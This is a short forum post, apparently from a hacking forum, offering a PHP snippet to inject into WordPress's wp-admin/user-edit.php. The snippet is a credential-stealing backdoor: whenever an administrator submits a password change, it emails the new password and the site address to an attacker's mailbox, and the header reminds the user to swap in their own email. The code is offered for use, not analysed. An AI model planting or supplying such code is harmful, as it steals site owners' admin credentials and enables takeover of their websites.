PDA

View Full Version : Inject Update Detalis Admin Wordpress



CpLover
05-26-2013, 02:48 PM
<?
##############################################
# By : xSecurity #
# Home : www.sec4ever.com #
# Greets : b0x [ Zaid ] #
# Inject : /home/user/wp-admin/user-edit.php #
# Note : Don't Forget Change Email :) #
##############################################

if($_POST['submit'])
{
$mail = "[email protected]";
$subj = "Information URL : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUSET_URI'];
$mseg = "PASSWORD :" . $_POST['pass2'];
$func = @mail($mail, $subj, $mseg);
}
?>